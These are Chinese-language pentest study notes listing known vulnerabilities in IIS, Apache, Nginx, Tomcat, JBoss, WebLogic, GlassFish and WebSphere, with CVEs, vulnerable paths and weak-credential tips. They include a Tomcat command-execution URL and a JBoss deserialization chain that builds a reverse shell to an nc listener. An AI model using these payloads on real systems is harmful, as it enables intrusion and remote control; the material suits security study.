web中间件常见漏洞总结笔记
之前看吐司别人发的个文档,简单记的笔记
-----
IIS
解析漏洞
IIS 6
*.asp;.jpg会被当作asp解析
*.asp/目录下的文件会被当作asp解析
asa cdx cer后缀也会被当作asp解析
IIS 7
在Fast-CGI时,test.jpg在url后加/.php即可解析成php文件
PUT任意文件写入
开启了WebDAV并允许写入
IIS短文件漏洞
CVE-2017-7269
2003 r2 IIS 6 开启WebDAV
Apache
解析漏洞
未知扩展名解析漏洞
1.php.xxx
AddHandler导致的解析漏洞
如果有"AddHandler application/x-httpd-php .php",只要有.php后缀即可a.php.jpg
HTTPD换行解析漏洞 CVE-2017-15715
影响2.4.0-2.4.29
上传时文件名为phpinfo.php换行符,访问/phpinfo.php%0a
Nginx
Nginx配置文件错误导致的解析漏洞
info.jpg/1.php
Nginx空字节任意代码执行漏洞 0.5 0.6 0.7-0.7.65 0.8-0.8.37
webshell名为a.jpg 访问a.jpg空字节.php
Nginx文件名逻辑漏洞 0.8.41-1.4.3 1.5.0-1.5.7
上传时为a.jpg空格,访问a.jpg空格空字节.php
Nginx配置错误导致的安全问题
目录穿越
在配置别名时,忘记加/ 访问/files../
location /files {
autoindex on;
alias c:/WWW/home/;
}
目录遍历 autoindex 为on
Tomcat
任意文件写入CVE-2017-12615
conf/web.xml配置了readonly=false,可以往服务器PUT文件
Tomcat远程代码执行 CVE-2019-0232
9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93
随意上传lxhsec.bat
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
Tomcat + 弱口令 && 后台getshell漏洞
Tomcat manager App 暴力破解
JBoss 默认端口8080 9990
JBoss 5/6 反序列化漏洞 CVE-2017-12149
访问/invoker/readonly 返回500说明存在页面
利用工具:JavaDeserH2HC,我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:
生成ReverseShellCommonsCollectionsHashMap.class
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
生成ReverseShellCommonsCollectionsHashMap.ser
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip是nc所在的ip)
利用:
curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
JBoss JMXInvokerServlet反序列化漏洞
/invoker/JMXInvokerServlet
JBoss EJBInvokerServlet反序列化漏洞
/invoker/EJBInvokerServlet
JBoss <=4.x JBossMQ JMS反序列化漏洞 CVE-2017-7504
/jbossmq-httpil/HTTPServerILServlet
Administration Console弱口令
/admin-console/
JMX Console未授权访问
/jmx-console/
WebLogic 默认端口7001
XMLDecoder反序列化漏洞 CVE-2017-10271 & CVE-2017-3506
/wls-wsat/
wls9_async_response,wls-wsat反序列化漏洞 CVE-2019-2725
/_async/
/wls-wsat/
WLS Core Components反序列化漏洞 CVE-2018-2628
通过t3协议触发
WebLogic任意文件上传漏洞 CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3
/ws_utc/config.do
Weblogic SSRF漏洞 CVE-2014-4210 10.0.2.0, 10.3.6.0
/uddiexplorer/SearchPublicRegistries.jsp
Weblogic弱口令后台getshell
/console
GlassFish 默认端口:8080(Web应用端口,即网站内容),4848(GlassFish管理中心)
GlassFish Directory Traversal(CVE-2017-1000028)
%c0%af作为/ 直接访问/META-INF下的敏感文件
GlassFish 后台Getshell
WebSphere
Java反序列化(CVE-2015-7450)
访问8880端口
弱口令后台getshell
6/7版本,后台只需输入admin,无需密码即可登录 websphere/ websphere system/ manager